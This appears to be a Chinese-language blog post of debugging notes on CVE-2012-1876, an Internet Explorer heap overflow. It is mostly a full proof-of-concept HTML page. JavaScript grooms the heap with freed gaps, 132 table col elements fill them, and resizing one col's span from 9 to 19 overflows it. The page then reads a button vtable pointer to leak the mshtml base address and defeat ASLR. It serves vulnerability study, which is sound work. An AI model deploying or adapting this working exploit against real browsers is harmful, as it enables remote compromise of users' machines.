CVE-2012-1876調試要點

時間 2019-12-09
標籤 cve 調試要點简体版
原文原文鏈接
調試要點：javascript
.childdbg 1命令無效時，直接在拖入poc.html以後進行Attach，中間會有IE的Active控件加載暫停IE
進行真實的exp調試時，需關閉hpa，使得程序的堆管理在正常狀況下進行
此poc的思想是先經過Js分配堆內存，而後再釋放一部分形成已分配堆塊直接產生空閒的間隙堆塊，以後再解析<table>的時候，會分配0x1C*max(span,4)大小的堆塊，poc中設置span=9，是由於0x1C*9=0xFC<0x100，恰好使得以前釋放的空隙堆塊再次分配出來，最後Js設置<table>span爲19，來形成溢出。因此總結起來堆塊的操做順序就是：先Js代碼不斷分配釋放構成空閒間隙堆塊佈局->解析<table>中span屬性將空閒間隙堆塊分配出來->Js代碼設置<table>span屬性來形成形成堆複製溢出。根據Html從上到下的解析順序獲得POC代碼以下
<html>
<body>
<div id="evil"></div>
<script language='javascript'>

        var leak_index = -1;
 
        var dap = "EEEE";
        while ( dap.length < 480 ) dap += dap;
 
        var padding = "AAAA";
        while ( padding.length < 480 ) padding += padding;
 
        var filler = "BBBB";
        while ( filler.length < 480 ) filler += filler;
 
        
        var arr = new Array();
        var rra = new Array();
 
        var div_container = document.getElementById("evil");
        div_container.style.cssText = "display:none";
        //1.佈局堆塊內存
        for (var i=0; i < 500; i+=2) {
 
            // E
            rra[i] = dap.substring(0, (0x100-6)/2);
 
            // S, bstr = A
            arr[i] = padding.substring(0, (0x100-6)/2);
 
            // A, bstr = B
            arr[i+1] = filler.substring(0, (0x100-6)/2);
 
            // B
            var obj = document.createElement("button");
            div_container.appendChild(obj);
 
        }
 
        for (var i=200; i<500; i+=2 ) {
            rra[i] = null;
            CollectGarbage();
        }


</script>
//2.佔位空閒間隙堆塊
<table style="table-layout:fixed" ><col id="1" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="2" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="3" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="4" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="5" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="6" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="7" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="8" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="9" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="10" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="11" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="12" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="13" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="14" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="15" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="16" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="17" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="18" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="19" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="20" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="21" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="22" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="23" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="24" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="25" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="26" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="27" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="28" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="29" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="30" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="31" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="32" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="33" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="34" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="35" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="36" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="37" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="38" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="39" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="40" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="41" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="42" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="43" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="44" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="45" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="46" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="47" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="48" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="49" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="50" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="51" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="52" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="53" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="54" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="55" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="56" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="57" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="58" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="59" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="60" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="61" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="62" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="63" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="64" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="65" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="66" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="67" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="68" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="69" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="70" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="71" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="72" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="73" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="74" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="75" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="76" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="77" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="78" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="79" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="80" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="81" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="82" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="83" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="84" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="85" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="86" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="87" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="88" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="89" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="90" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="91" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="92" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="93" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="94" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="95" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="96" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="97" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="98" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="99" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="100" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="101" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="102" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="103" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="104" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="105" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="106" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="107" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="108" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="109" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="110" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="111" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="112" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="113" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="114" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="115" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="116" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="117" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="118" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="119" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="120" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="121" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="122" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="123" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="124" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="125" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="126" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="127" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="128" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="129" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="130" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="131" width="41" span="9" >&nbsp</col></table>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" >&nbsp</col></table>

<script language='javascript'>	
    //3.修改span屬性形成堆中的複製溢出
	var evil_col = document.getElementById("132");	
	evil_col.span = "19";
	alert("after over flow");
	
	var leak_addr=-1;
	for(var i = 0;i<500;i++){
        //#檢測到被溢出的堆塊，向後越界訪問到下一個堆塊（屬於button），讀取到button的虛函數表，由於虛表地址
        //在.rdata，虛表地址的位置相對dll基地址的偏移固定，因此CBuutonLayout虛表指針-偏移=mshtml基址
		if(arr[i].length>(0x100-6)/2){
			leak_index=i;
			var leak=arr[i].substring((0x100-6)/2+(2+8)/2,(0x100-6)/2+(2+8+4)/2);
			leak_addr = parseInt(leak.charCodeAt(1).toString(16)+leak.charCodeAt(0).toString(16),16);
			alert(leak_addr.toString(16));
			leak_addr=leak_addr-Number(0x001584f8);
			alert(leak_addr.toString(16));
			break;
		}
	}    
</script>


</body>
</html>
相關標籤/搜索
每日一句
每一个你不满意的现在，都有一个你没有努力的曾经。